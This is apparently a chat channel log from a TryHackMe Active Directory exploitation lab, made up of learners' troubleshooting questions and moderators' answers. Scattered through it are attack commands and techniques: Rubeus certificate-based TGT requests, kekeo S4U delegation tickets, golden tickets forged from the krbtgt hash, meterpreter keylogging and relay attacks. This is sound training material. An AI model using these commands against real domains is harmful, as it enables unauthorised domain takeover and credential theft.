#exploiting-ad
Really good to know, were you using a meterpreter session as the shell or something else? I've been fairly lucky with the THM labs and shell latency, but I've run into it before and it can bring things to a crawl. Curious if high latency could be avoided more by changing the type of shell or by changing the protocol.
I tried both and was having the same result both times. I think my room may have just been busy and had a bunch of people hammering it at the same time.
I can't tell if I broke the 10.200.83 network or someone else did. But I lost connection after using evil-winrm and my ssh connection dropped. It's been 15 minutes since refreshing the page and I can't access the network anymore.
People are trolls deleting mimikatz
Definitely helped a lot. Had the same issue on a different network
Yeah I had a lot of issues with people deleting things as I was working. Sorry you dealt with that.
I have questions about task 2. It says the domain users are misconfigured and they are able to add themselves to IT Support because they have AddMembers, but I see they have GenericWrite over IT Support. Where does it show AddMember?
GenericWrite means that you can write to any attribute for the IT Support AD Object. One of those attributes to write to, would be the Member attribute, which is why you can add a member to the group
There are other ways you can exploit this misconfiguration, but the AddMember option is one of the easiest and least disruptive methods to exploit it, which is why it is showcased
Thanks for the info
Gave +1 Rep to @glacial stream
Is anyone able to use the exploitad network? Looks like it is down even though it shows running
It was fine but suddenly lost all ssh connections
hi
Is the vpn working?
Hello, I am currently on Exploiting Kerberos Delegation and I see this text "If you were to perform proper post-exploitation enumeration of THMWRK1, you would find that there is a service on the host running as the svcIIS user." I'm wondering what kind of enumeration techniques can be used to find a service like this?
Quite a number of tools can help you here.
You could go the manual route and enumerate:
- Processes
- Services
- SCH Tasks
You could use enumeration tools like WinPEAS or Seatbelt
Local host enumeration is an entirely different area of security. So something to look into more!
Really good module to look into if you are interested in this portion: https://tryhackme.com/module/post-compromise
After gaining access to your target network, get ready to learn how to establish your first point of persistence, elevate privileges locally, gain awareness of your surroundings and gather enough information to plan your future moves carefully. By the end of the module, you will gain the skills required to secure your initial foothold and identi...
Thanks a lot, I will look into it
Gave +1 Rep to @glacial stream
For Network Services 2, when I mount the NFS share, the Cappucino directory is empty, and the questions indicate it's supposed to have files. Can anyone help or assist?
Hi! I'm stuck at task 5: I got a meterpreter shell but it looks like trevor hasn't opened explorer
Should the net need a reset?
Please check the pinned messages for starting the service yourself
Ok done, but how long do I have to wait to get a key dump? Me impatient
Hello, I was working on this network but I cannot access THMWRK1 anymore via RDP or SSH
guys i don't understand 17462.txt on exploitdb and when i run the binary it gives "you're not allowed, go away!" or something
I have been waiting for 15 minutes after adding my initial user into IT support group. So I still can't change pass to Tier 2 admin
No permissions
I tried gpupdate /force and reconnect via ssh, still not working
After 30 minutes it works
AD works in mysterious ways
Nothing, the user account has expired. So change the server admin pass and rdp in. Set account to never expire and remove change password on next logon
run the powershell in pinned chat with THMSERVER1 and restart server
@fiery nexus check it now if you're online while it's working, or reproduce the steps mentioned
Hi guys
I successfully created and cached the HTTP and WSMAN service tickets with imports confirmed when I check klist.
I'm having an issue with the New-PSSession -ComputerName thmserver1.za.tryhackme.loc command. I get the following error message
New-PSSession : [THMSERVER1.za.tryhackme.loc] Connecting to remote server THMSERVER1.za.tryhackme.loc failed with the following error message : WinRM cannot process the request. The following error with errorcode 0x8009030e occurred while using Kerberos authentication: A specified logon session does not exist. It may already have been terminated.
I've tried letting the timer for the network run out and start it up again with no success. Any suggestions with getting WinRM started? Thanks all!
There is no process called explorer.exe mentioned in the "Exploiting AD Users" task. I am on a meterpreter on thmserver1.za.tryhackme.loc as system
someone else facing the same issue?
reset is at 1/5 sadly
nvm, checked the pin
I have this ticket in cache, but still cannot access \\thmrootdc.tryhackme.loc\c$ Any ideas why?
nor am I able to do winrs.exe -r:thmrootdc.tryhackme.loc cmd.exe to get a shell
I made the ticket using this
in fact, after submitting that ticket in the session of an admin user on THMSERVER2, I can't even pop a shell on THMDC.ZA.TRYHACKME.LOC via winrs.exe -r:THMDC.ZA.TRYHACKME.LOC cmd.exe
I put the NTLM hash of krbtgt in /rc4: btw, in case that makes it wrong
If the ticket is in ccache format it should be used on Linux with impacket or similar tools; it needs to be in kirbi format to be used on Windows
I did not export the ticket. I have used the /ptt flag to inject it into session
I think I got the rc4 wrong. I put the NTLM of krbtgt there, I wonder if something else was supposed to be there.
Did you use token::elevate with mimikatz before creating the ticket?!
I don't remember, I think I did not.
Shouldn't it be irrelevant whether we used token::elevate or even privilege::debug while creating tickets, since we have all the required credentials?
It does. If you use token::elevate it will inject the ticket into the wrong context, that's why I asked
I mean, this worked for a normal golden ticket too, but I don't know what the issue is while doing it for enterprise admins and the forest root
Oh, I understand
I'll actually try this once more today since the lab has been reset. Hopefully I figure it out.
The way I did it was with impacket's ticketer.py, maybe give it a shot and see how it turns out
Okay, will try. Thanks
Okay, I did it again, this time it worked. The Reset was fresh so I guess there was some role of that.
But I had one Question in mind. If one is a Domain Admin of za.tryhackme.loc, then why do I need to build an attack to access the Parent DC? (okay, here is what I gathered from the Internet, DA of za.tryhackme.loc is not DA of tryhackme.loc)
Also, how can the Domain Trusts Vulnerability in question here, be prevented?
If you control the parent DC, then you control all child domains. So you compromised za.tryhackme.loc and used that to fully compromise tryhackme.loc as well. This means you would now be in full control of uk.tryhackme.loc and us.tryhackme.loc as well, for example. That's why you aim to compromise the parent domain as well. Also, in the parent domain it is no longer Domain Admin, it is Enterprise Admin, as in admin over the entire Enterprise. Even more privileged than DA.
It can't. It is intended functionality. So it isn't really a vulnerability. It is simply a fact that there is bidirectional trust and we have compromised one of the domains in this trust relationship. But it has to be trusted, which is why it is intended functionality. That's why you should always take good care of your CHILD domains as well to make sure they are not compromised. There are detection techniques for this, but at that point it is a bit too late as the entire child domain has been compromised.
It sure seems like a vulnerability if I can use a domain admin account to always get enterprise admin access (for bidirectional trust). I know a lot of Active Directory is "intended functionality" though heh.
If bidirectional trust is default then even more so
Also, I love your network labs btw.

So I think there is a missing step here. No DA has the ability to "just become an EA". The truth is, any DA has the ability to perform the malicious action of dumping the NTLM hash of the KRBTGT account and then leverage this hash to forge a malicious ticket.
In the same vein, any DA has the ability to delete the entire domain structure. Is that a vulnerability? Not really, just intended functionality being used for something incredibly bad, which is why you want to make sure to protect something like DA access.
I know it feels bad, but the fact is, somewhere something has to have access in order to work. Thus, we need to protect it, cause access to it will end really badly.
Also, we can build detections for this misuse to help us respond to it. It's not perfect, but we won't be able to really remove the true power that "admin" will have.
Hope that helps a bit?
Glad you are liking them!
Yeah, the DA being able to forge that ticket is what I was implicitly talking about. I do get what you mean. I initially thought the DA would be like an unprivileged user to the parent domain. But it seems that's not the case.
Yeah that's correct, the DA is not a user in the parent domain. We are leveraging the KRBTGT hash to forge a ticket.
This entire progress gets even more whacky in domain trusts that are not parent<->child configuration. Inter-realm tickets are a magical thing to explore if you have some time!
Evil-WinRM fails to connect to THMSERVER1, and I can't ping THMSERVER1 either. Does the network need resetting? @glacial stream
Probably yes. Check the pinned messages for what you can do for debug purposes. If that's the case will have to vote reset
Thank you. Been through the pins. I'm the only one on the server, so I'm slowly waiting every hour to vote.
Gave +1 Rep to @glacial stream
Sorry about that, sadly I can't admin reset anything here
No worries, I'll do some other study in the meantime
Thanks again for the support.
autologin.ps1 or auto-login.ps1 ?
May need that pinned message updating if I'm looking at the right server
C:\autologin.ps1 trevor.local <chosen password> THNSERVER1
should be
C:\autologin.ps1 trevor.local <chosen password> THMSERVER1 (typo with an N in THM)
Should be fixed thanks!
Gave +1 Rep to @steel plaza
Anyone else having any issues in Task 5 - Exploiting AD Users, I got a shell and everything, but I don't have any process running with THMSERVER1\trevor.local when I issue the command ps | grep "explorer" in the meterpreter shell, I think the network might need a simple reset though... can anyone vote for the reset on the network as well?
Nevermind, I just read the room comment, all good
This is why you ask for help, because every time you do... you will just figure out shortly afterwards
Glad you got it sorted! My suggestion is to always check the pinned messages. 99% of the time a fix for the problem is already mentioned there
"Exploiting kerberos delegation" giving me this error
Has anyone got a solution for this?
Nevermind I fixed it lol
Does anyone have a fix for the keyscan_dump not working?
I've started the explorer process manually, and I've also followed the steps on the pinned message
I can migrate
and I am indeed running keyscan_start as trevor.local
But its been 25 minutes and no credentials yet
how much time does this take usually?
to "replicate" my permissions on the network
ran gpupdate 5 times probably and waited around 20 mins
still nothing
- I've done everything before this right, checked 3-4 times
Hello. I'm on task 7, and while attempting to run Rubeus, I receive the following error when trying to run asktgt:
KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
Can someone please help with this?
Thank you.
Can you verify yourself and then post an image of the error here including all previous commands?
This is the Rubeus command and the output.
I also attempted the request with the /noask as well as /pkinit_etype:aes128_cts_hmac_sha1 options. I receive the same error regardless.
I have also reset the lab and started from scratch, thinking perhaps something went wrong with the DC, but this also didn't fix my error.
Can you please send me your VPN IP? So in your VPN file, look for that internet IP that your VPN is connecting to and then I can check for you quickly
Seems like the CERT has expired for Kerberos authentication and for some reason did not renew. I can fix it for individual networks if you send me your VPN IP. Will get the team to deploy a patch
New one up and running in the 10.200.63.X subnet
My VPN IP is: 10.50.98.6
That is your personal VPN IP. I'm looking for the internet IP you can find in your VPN file, the OVPN file
Ah.
Like where your VPN is actually connecting to
Stand by.
In the .ovpn file I have remote 54.155.75.117. Is that what you are looking for?
Indeed, couple seconds please
Thank you.
New certificates are enrolled. Your Rubeus command should work now. Note this fix will only work until the network is reset, until we deploy the full patch
w00t! It worked! Thank you so much for that.
Gave +1 Rep to @glacial stream
Hi, I'm having trouble with the last task of exploiting-ad. I've created and exported the certificate exactly as instructed, but I used to get the error "KDC_ERR_PADATA_TYPE_NOSUPP"
But now I'm getting the following when trying to execute rubeus.exe:
Hey there, please see the messages above on that error. We have now deployed the patch, so if you vote reset for the network the patch will take effect. Not sure what is happening with Rubeus though. On which host in the network is that?
Thanks, I believe it was on THMSERVER2.
Gave +1 Rep to @glacial stream
I think a network reset should solve the issue. No updates were made to Rubeus so it should be working as is with the server version
Hi, I'm not able to reset the password of t2 admin user in task 2. Somehow, I do not have sufficient permissions. But I added previously my user to the "IT Support" group and also enforced gpupdate.
Am I missing something?
Ugh a network reset right as I was getting the flag
Ha, fun times.
Awesome network!
+rep @glacial stream
Gave +1 Rep to @glacial stream
Hi everyone!
I have trouble with the exploiting AD room. In Task 2 there is a screenshot about the force change password option in the IT Support group. But I cannot find it using BloodHound. I captured a screen video
I mean I know IT Support has force change password according to Task 2. But where can I find it?
Sometimes when you execute bloodhound using low-privileged credentials (or the wrong execution flags for that matter), you won't be able to discover all information, which then hides certain attack paths. That's why the BH data was given here as a taskfile as well. However, given that this "force change password" permission is configured within the normal AD structure, using the correct execution flags for BH should find the path for you. But again, some weirdness can happen with low privileged AD creds
Oh I never knew that. I executed bloodhound in my linux, because it is easier to download file and run, because attackbox is lagging and I couldn't connect via vpn
Is anyone using exploitad now? It is not working. Maybe someone can help in resetting?
Should this be THMWRK1?
I'm getting errors adding a member to the IT Support group as described by the task on THMWRK1. Looking into it more.
Worked on another powershell session.
Works only with "huge.jones" (which I think already exists). Doesn't work with a completely new user.
Worked after spamming the command a few times.
Anyone issues with ExploitAD Room?
What sort of issues?
Hi, I'm encountering an issue with my Kali box. It cannot resolve the domain name thmserver2.za.tryhackme.loc.
Troubleshooting steps taken so far:
Followed the instructions in the room:
a) Changed the DNS server to THMChildDC IP.
b) Restarted the network interface.
c) Tried nslookup, but it didn't work.
Attempted to change the DNS server using nmtui and removed the public DNS (e.g., 1.1.1.1) so that only the THMChildDC IP remained. However, both steps didn't work.
Restarted both my PC and the laboratory.
Regenerated the VPN profile.
As a sanity check, I tried the same room instructions on other rooms (breaching AD, Enumerating AD, and lateral movement) and didn't encounter any problems.
In the exploiting AD room/lab under exploiting GPOs, when I use CMD runas as user t1_trevor jones and the password, it says username or password incorrect when I try to check the dir \\za.tryhackme.loc\sysvol path. Need help
At this point you are
You don't have access to the rootdc yet
Gave +1 Rep to @silent swallow
You're welcome
I've been having this issue the past couple of days where the room will time-out, so I go to start it back up but DNS no longer seems to resolve. Anyone else have this issue?
A full network reset seems to resolve it, but of course I have to wait for 5 votes
is the network down, can't reach it anymore :/
I have a question regarding the following part:
Why can I only do it with a low privilege user from THMWRK1? I tried getting the information with a t2 and t1 admin and neither worked.
I get the following error in that case:
Got another problem:
I'm 100% sure that I have a golden ticket and should be able to get to the rootdc, but it says, that it doesn't exist
I can only look for "thmdc"
"thmchilddc" also doesn't exist when trying it, even though both should be there
nevermind, I'm dumb
Since it's the root-DC, the "za" has to be removed...
guys help, I am at exploit ad
but when I try to get a meterpreter shell it only downloads the file in archive mode
and I tried icacls to change the mode
but it remains a
done
Can someone vote to reset this network? It doesn't seem to be working at the moment. I just need one more vote.
You need to state your subnet.
I didn't realize. Thanks! It is 10.200.98.0/24 with the DC being: 10.200.98.101
has anyone had issues with getting the password using keyscan_dump. I migrated the process to an explorer process with trevor.local. However, keyscan_dump returns nothing. Am I missing a step here?
guess that is one of the later tasks
This is for the exploiting AD users section
I can follow everything up until this point
ah yeah shadow has not got that far yet... so can't really help
only completed the first 3 tasks....
ah ok, no worries. Let me know if you have any luck with it
thanks... but taking a break until tomorrow afternoon
hope you can figure it out or get it working before then
Hi, just wanted to see if anyone was aware that the DC in this room is unreachable?
I was trying via VM, but loading attackbox now to show the pings to 10.200.98.101 is not working
```
root@ip-10-10-49-8:~# ping -c 3 10.200.98.101
PING 10.200.98.101 (10.200.98.101) 56(84) bytes of data.
From 10.50.95.1 icmp_seq=1 Destination Host Unreachable
From 10.50.95.1 icmp_seq=2 Destination Host Unreachable
From 10.50.95.1 icmp_seq=3 Destination Host Unreachable
--- 10.200.98.101 ping statistics ---
3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 2051ms
pipe 3
root@ip-10-10-49-8:~# route | grep 10.200.98
10.200.98.0 ip-10-50-95-1.e 255.255.255.0 UG 1000 0 0 exploitad
```
Hi, all,
I need some help regarding room "Exploiting Active Directory" task 7. There I want to create a TGT using Rubeus but I always get an error message saying "No answer from domain controller":
```
C:\Users\phillip.wilkins\Downloads>\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:FakeCert-pass123.pfx /password:pass /outfile:Administrator.kirbi /domain:za.tryhackme.loc /dc:10.20.120.101

   (Rubeus ASCII banner)
   v2.0.0

[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=FakeCert
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.tryhackme.loc\Administrator'
[X] Error connecting to 10.20.120.101:88 : A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond 10.20.120.101:88
[X] No answer from domain controller
```
Any ideas how to find the issue?
Nevermind, typing IP addresses is somehow difficult
Currently bricked out of this network. Does the "reset network" option just legitimately not work?
Even if I vote as the hammer vote the "reset" doesn't seem to correct the problem
Had this problem in the lateral movement room as well, only "resolved" it by waiting a couple of days until the network worked. Someone suggested "leaving" the room but that didn't work for me here.
My current domain controller is 100.200.98.101
what specifically are you doing that makes you think it is broken
and yes the reset option should work
I cannot reach the domain controller at all
Or any of the other servers in the network
via attackbox
ping to the DC, SSH or RDP to the jump system (THMWRK1)
all fail
doh
Also just reset the room (I was the 3rd vote) and after it finished resetting, this is what it shows (even after a refresh)
windows machines do not respond to normal ping commands
The domain controllers in these rooms definitely respond to ping
I was working on this one yesterday (first task) and the domain controller responded to ping fine
!vpnscript
have you tried using this to troubleshoot your VPN connection, as that could have been part of the problem
I'm using the Attackbox, not VPN
did you forget to run the setup commands in task 1 again after you started today???
the image you showed also shows the network only had 7 mins left to run so it could have stopped itself
systemd-resolve --interface exploitad --set-dns 10.200.98.101 --set-domain za.tryhackme.loc
Why would it stop itself immediately after I initiated a reset?
good question but dunno
Even if that is the case (I'm going to just let it expire, don't see why I would let it keep going), that's a problem on its own lol
@glacial stream is this something to look into????
I'll also just repeat that I had this exact same problem in the lateral movement room, only thing that got it working was me waiting a couple days and trying again
Including how the "reset" hammer vote doesn't seem to really do anything
it meeping should which is making it weird to shadow how it could possibly be broken
the network reset and time for the machine to spin up again can take around 5-10 mins though
I've tried a few times (both in this room and the other one) post-reset and experienced the same result actually
Usually just sets the counter back to what it was and the hosts are still unreachable
@topaz ore if you want support on this, can you please follow the steps in the pinned messages and report back the findings. Also, even if you are on the AttackBox, you will have a VPN connection to the network, the attackbox just does it automatically for you. If you don't see the VPN connection in the attack box, my suggestion would be to reset your VPN profile, stop the attackbox, then reboot it again
@glacial stream which pinned messages?
They are pinned in each of the channels of the networks I created. Only one I did not do was the Lateral Movement one
Understood, thanks! I'll look into it probably later this evening
Hi, I have a question regarding "These credentials can now be used to get a shell on the host!" in Task 4. Once we get the password from hashdump, how can we use it to get a shell? I tried SSH directly from my attack machine, but it was denied by server1.
Hi @glacial stream - After reviewing the pinned messages, it looks like the situation matches the "bricked network" description. But again, even if I hammer the last vote of the reset, the network doesn't exit the "bricked" mode
As mentioned in the pinned messages: "The best thing to do is to wait until the network time expires, then press the "Start" button again.". If you hit reset, you are trying to reset something that isn't active, so it can't be reset. A reset won't fix the issue, the timer expiring will.
If you truly believe that you are in a network with an issue, you can send the subnet here and I will investigate. In the meantime you can leave the room, wait an hour, and then rejoin and it should place you in a different subnet.
Have you completed the Lateral Movement and Pivoting room? It is the one before this and details several methods you can use with credentials to access the host
Thank you so much for your reply. Now I successfully logged in with the evil-winrm tool.
Gave +1 Rep to @glacial stream
no need to wait an hour... about 15 mins is enough to nearly guarantee a different subnet
meeps shadow got away with just waiting 3 mins to play subnet roulette to get a new subnet
Btw, one thing that has always bothered me and I do not seem to find an answer to this: The latest releases of BloodHound and SharpHound are incompatible with each other
Or am I doing something wrong here?
The JSONs created by the latest SharpHound have the version 5
The latest BloodHound release is version 4
And also when importing the SharpHound JSONs in BloodHound you get an error
hmm
This does happen sometimes. Which is why it usually helps to keep your versions in sync with what works. I usually use both a couple of versions back until I know the new ones are stable
having this exact issue on another room. the json file is fine, grabbed it twice to be sure, but the file won't open
Hi, I've been having some trouble making a reverse shell on the networkservices room https://tryhackme.com/room/networkservices I don't get any response from it, am I missing something?
In Exploiting Telnet, Task 7
I perform the ping and leave it open, then I generate the payload and run it on the telnet server, but I don't see any response on the nc listener
What command are you using? Uploading your code or screenshot would definitely help!
Hello everyone. I'm having problems with the "Exploiting Active Directory" room. For some reason I can't reach the DC. I added the DC IP in "additional DNS Servers" as usual, but it didn't work. To test if the problem was my Kali, I used the "Lateral Movement" room lab, and it worked out fine doing the same steps. Does someone have the same problem?
On the pinned messages you can find the command. What happens when you run an nslookup specifying the DC IP as the name server? So commands number 1 and 2?
same issue here (since yesterday): the target network is unreachable from both AttackBox and embedded Kali.
It's not a DNS misconfiguration, since the DC is not reachable even with its IP:
```
$ ping 10.200.77.101
PING 10.200.77.101 (10.200.77.101) 56(84) bytes of data.
From 10.50.69.1 icmp_seq=1 Destination Host Unreachable
From 10.50.69.1 icmp_seq=2 Destination Host Unreachable
From 10.50.69.1 icmp_seq=3 Destination Host Unreachable
```
I tried the "unbricking" trick, tried to reset it several times, but nothing works.
From 10.50.69.1 icmp_seq=1 Destination Host Unreachable - Means the network is not running. Will ask them to investigate, but a simple Start should put the network in the start mode
Network has been hard reset, should be ready to go
I confirm that it's back and reachable now. Thanks for the reset.
Gave +1 Rep to @glacial stream
can't connect to http://distributor.za.tryhackme.loc/creds
pls help
i did systemd-resolve --interface exploitad --set-dns 10.200.98.101 --set-domain za.tryhackme.loc
but the problem IS the dns
nslookup thmdc.za.tryhackme.loc doesn't work
Are you using the attackbox or you own machine?
Attack box
Can you send the output from the steps listed in the pinned messages so we can isolate the problem?
ok, thank u, let me try
the ping seems not to work, but THM says that the machine is online
it is continuing
should i stop it?
If you don't reply to the message, I don't get a notification for it. That says the network is not active. Wait until the network time runs out and then restart it
Sorry! Btw thanks, I'll try
I followed the steps and reset the machine but now this happens
am i doing something wrong?
check the pins for troubleshooting tips... think you might have a dud DC
i refreshed and i did the restart button thing
¯\_(ツ)_/¯
thanks the same
thmwrk1 is not a nameserver. Only the DC is. So you are asking nslookup to try and resolve tryhackme.loc with thmwrk1 as the DNS server. So that is not going to work at all
If you want to verify that dns is up and running on the DC, which is the DNS server, you would run nslookup tryhackme.loc 10.200.98.100. This tells nslookup to try and resolve tryhackme.loc and use 10.200.98.100 (which is the rootdc) as the nameserver
I'm doing the permission delegation task, right at the BloodHound part, and with it I'm supposed to find the paths, e.g. the connection between "domain users" and "tier 2 admins", by adding them as the starting and ending nodes, respectively. However I cannot add them; the buttons simply don't do anything.
What am I doing wrong?
Edit: retrying on another day worked, so there was a problem with the AttackBox on that day. No one tried to help me, that's discouraging...
has anyone cracked the password of the kdbx file in the Exploiting AD Users task ?
Please share how you were able to do it?
Because if we are supposed to get the password via keylogging, I cannot do that because I am not seeing explorer.exe in the processes even after using the auto_login PowerShell script and restarting the server.
I have tried logging in via RDP, migrating to the process and starting keyscan. But even after 5-10 minutes, I am not seeing the password
Never Mind I got it
can't download file from python server
What are you trying?
python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Invoke-Webrequest -URL "http://10.10.92.17:8000/shell.ps1" -OutputFile "shell.ps1"
ERROR:
A parameter cannot be found that matches parameter name 'URL'.
am i not using http?
sure
pls help
@glacial stream sorry if I @ you, I don't know if I can, and I will not do it anymore if you tell me not to, but I guess this is a network problem(?), I saw a walkthrough and it works differently
i saw the machine also restarted since i did it the first time and the problem still remains
On which machine are you trying to get the CERT?
Also, can you click "Show all templates" and just screenshot what the error is next to the certificate template?
thmserver2
they are all like that
I didn't follow all the steps to arrive here; I wasn't able to do it all at once, so I used the fact that the GPOs are already exploited and entered like that
It is complaining about permissions. Are you doing it as the computer object or another account?
GPO is not needed for the certificate exploit, but only a specific account can request the certificate. If I remember correctly, it was the computer account. Did you select computer account for the certificate snap in?
That's not gonna work. Are you running MMC as admin to allow you to specify the computer account?
sorry, I didn't read it, my bad, thank you so much
thanks
Gave +1 Rep to @glacial stream
Hello, I see the network as "running" but can't nslookup, I already configured the dns with "systemd-resolve --interface exploitad --set-dns 10.200.63.101 --set-domain za.tryhackme.loc" I'm using the attackbox. Is there a problem with this network ?
nevermind it restarted
Hi. Have the same issue today as @fast saddle
2/4 votes for reset. Could anyone please vote to reset it?
is there something wrong with the network ? I even tried to use the attackbox did reset it yet nothing it is not responding to pings and I can't resolve the DC IP
exploiting and lateral movement both don't resolve DNS for me, pinging IPs directly works
do the networks get Windows updates regularly? the newest updates set Windows servers to prefer IPv6, which tends to break DNS resolution if no IPv6 zones have been set
network reset doesn't work for me either unfortunately
The network is not working for me. I can't reach it using the attack box
it's been an issue, vote for reset
Are you all on the same subnet?
Did you take a look at that: #exploiting-ad message
didn't know about the tryhackme.loc but pings stopped working too since yesterday
Did you then check this post: #exploiting-ad message
i'll do an extensive trouble shooting this evening
I don't think it's gonna work! I've been trying to work on this lab for 3 days with no luck!
i am in subnet 10.50.61.0, the network i can connect to is 10.200.64.0
(i used the lateralmovement network but it's the same for exploiting ad)
traceroute stops at the gateway of the subnet
ping doesn't work
nslookup doesn't work either
Did you try the "network bricked mode state" pinned message too ?
Could you also show me a screen of the network diagram in the room?
Okay, ye maybe try to reset the network
If that doesn't help, maybe leave the room, then join again and create a new vpn file
Make sure to also press regenerate before downloading the vpn file
Sounds already like some progress
Looks like we are on the same subnet, ping works fine for me currently
works fine now
either the network or the subnet is borked atm
thanks for your help
Do you use lateralmovement vpn file??? not exploitad vpn file?
i had the same problem on both networks
which is why i used them interchangeably
Ok!
Hi everyone, I've done this lab but I have some questions left about it.
How can I find by myself the svcIIS account?
And did anyone run sharphound by themself? because I did it and I can't see the "AdminTo" relationship
Just sending here as well for anyone else that is interested:
So Sharphound enumerates permissions such as "AdminTo" by connecting remotely to the registry of each host. Of course if the account you use to run sharphound does not have the relevant permissions to read the registry, you will not be able to see this information. That's why usually as you get more privileged accounts (through compromises), you will rerun sharphound with these privileged accounts to get more insights and data.
That being said, there are ways you can find out that svcIIS has some permissions on that host. To do this, take a look at the SPNs set on both that host and the svcIIS account. These will tell you that svcIIS has delegation permissions on that host. Rather than relying on standard Bloodhound queries, you can write your own cypher query to get this data and enumerate it that way. Here's a link to some pretty powerful cypher queries: https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Thank you a lot!!!
Is this module working properly?
ain't getting response from THMWRK1, im stuck in part 2. Came across with the same problem yesterday with the Enumerating-AD module.
noooooooooooooooooooooooooooooooooo
someone reset the network as i was almost done
ouchies that can hurt a lot
at least there are decent backups of progress for this network
the red team capstone challenge network was a huge hassle with the resets
Sheeeeesh this room has been nothing but trouble... The attack box randomly froze on me, now the servers are unreachable all of a sudden. I was just past where Ninzus was.
Hey guys, Suman here, I have been learning active directory for a while now, few mins ago I solved the https://tryhackme.com/room/attacktivedirectory Attacktive Directory room, I just have one question, when using pass the hash technique, I was able to get access to the administrator account, but using the same technique I was not able to get into the backup or svc-admin account, it was asking for the password if used impacket-psexec and throws an error in evil-winrm, but goes smoothly with Administrator account, why is that I was able to get into admin account but not the other non admin account?
Hi guys, I am trying to complete this task in Exploiting Active Directory Task 3, but I'm getting an error. I already followed every step 1 by 1 but still get the same error. I want to share the screenshot but can't paste the pic in here
Can you guys help me to solve this
You need to be in the same directory as the .kirbi file when you run those commands in mimikatz
i keep getting a timeout when i try to transfer a file onto the windows machine in exploiting AD task 5. How can i fix this? I have administrator rights. I tried via webclient on powershell and certutil.exe
Can anyone help me?
host with python and curl url -o file.exe
is there anyone here that can help me with Task 6 of Exploiting AD? Bloodhound results arent showing me the management server GPO thing.
Also when i do the runas the svcservman i paste the correct password and get the cmd of the servman account
but when i start mmc.exe its empty, can some one help me?
@glacial stream
hello everyone, i am doing task 5 of the exploit AD room, and the process of explorer.exe for trevor.local is just not showing up, no matter what i tried. the steps given to do in this case do not work: after the command shutdown -r the server just shuts down and is unreachable until the network starts again (i tried this for 2 new networks already), any ideas? maybe how to start the process for the user in another way?
Hi, is there any issue about the database.kdbx ? I have downloaded the one related to the local user as said, but there is no more flag in it..even if I see that it is a little heavier than two others
Am I doing something wrong ?
There is just the two samples, without any other entry
my bad, I forgot replacing the first file by the new one
All AD rooms are currently going through an update ive been told. So some machines could be a bit buggy!
suggest me appropriate linux for pentest which won't crash every other week and which is stable os
Just run kali in a VM and you should be fine, other popular options are Ubuntu or ParrotOS, but Kali is by far the most popular.
Kali
Or can use the attackboxs
Hey, I'm getting the same error. Can you retrace your steps? I created the TGT several times and I always got the error.
I keep getting this error, even after restarting the network
I could RDP for a while and do my thing
then I got kicked out and got this error
looks like you sent the interrupt with ctrl + c
It does, but I'm sure I haven't
I was clicking through the mmc of the target machine
maybe try remmina
The entire DNS broke right after
GG
Second time this happened ;-;
It just randomly happened earlier too
then I rebooted the network
after 15 minutes
it was back down and crashing
ouchies
yep yep, not a great time
Just think, every time something doesn't work, it's an experience gained.
Hi,
In Attacktive I can't john/hashcat the Kerberos hash of svc-admin.
I tried with the rockyou and personalized wordlist without success. Any idea ?
I looked on some writeup (and found management2005) and everyone does exactly like i did ...
Try using grep -n to see the line number of your wordlist
You can use that to calculate the amount of time it would take
i even created a file with only the good password and no success
Are you sure you have the right hash then?
i did exactly like 5 write-ups
even in videos
the hash change due to kerberos but the process is exactly same
This channel is the wrong channel for that help, this is for the Breaching AD room. @dark dust
I'm doing task 5 and I'm stuck coz I can open the keepass database but there's no flag or svcServMan, any idea? This is bulls**t. I'm paying every month to waste my time coz there's no organization.
@magic furnace Spam
Can someone +1 to reset the "Exploiting AD Room": https://tryhackme.com/room/exploitingad. I was halfway through it but suddenly I am unable to even ping the DC
I keep having problems with this room with the network going to sleep while I'm working. I've been inside an RDP session and the connection just drops. Right now, same as you, can't ping DC
In the task3 task of Exploiting Active Directory room, after I used mimikatz's lsadump::secrets command, an ERROR kuhl_m_lsadump_secretsOrCache; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005) error occurred. Can the staff reset the room?
you will need to vote, state your subnet
Hi the network state has been stuck at "resetting" for the past few days. Any ideas what I can do?
For the exploiting-ad room
You can leave the room and then wait a bit and rejoin, you will probably be assigned to a different subnet. You should also probably mention which subnet is bugged for you though so that staff can look into it if it has really been broken for so long as you say
Subnet is 10.200.47.0/24 (I'm assuming it's a /24?)
Hey guys!
ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
How to get rid of this error in TGS tickets part in Exploiting AD task 3? Im following all steps but still getting this issue. What could cause this error?
Commands im using:
In kekeo
For TGT
Tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:password
For TGS,
Tgs::s4u /tgt:ticket-name /user:t1_trevor.john /service:http/THMSERVER1.za.tryhackme.loc
Any help will be appreciated.
Guys the TGT and TGS files that are created can be found where?
I cant find it anywhere
Your password for svcIIS user is wrong here when creating TGT and you can only create a TGS if you have a valid TGT. Also TGT & TGS will be stored in your Current Directory.
Even with correct password its giving error. And the files are not stored in current directory.
Cant find them
can you share a screenshot
In the Exploiting AD room Task 4 should i keep the privilege gained from Task 3 or can i only use the tier 2 admin account gained from task 2?
i tried with the t2_admin_acc
i keep getting this error and another diff. errors on the relay capture side
TargetServer: \thmserver2.za.tryhackme.loc, CaptureServer: \Attack_Box_IP
RpcRemoteFindFirstPrinterChangeNotificationEx failed. Error Code 1722 - The RPC server is unavailable.
Can you share a screenshot of what you tried?
I'm guessing it's a problem with your impacket but again i can't confirm until i see a screenshot
Can't send a screenshot currently unless it's dm's.
oh didn't know that
btw why
Bot is being changed over.
It worked.
I reset the progress for the room and attempted again.
Once i reached the tgt part i simply moved the files in the mimikatz directory and it worked.
can impacket-ntlmrelayx provide authentication to LDAP? anyone have idea?
for information -. use this syntax 'ldap://10.10.10.10'
Is the room working right? I'm using the Attack Box and SSH into the initial user is delayed then just stops/freezes midway through the first command. I have a Fresh Room reset too.
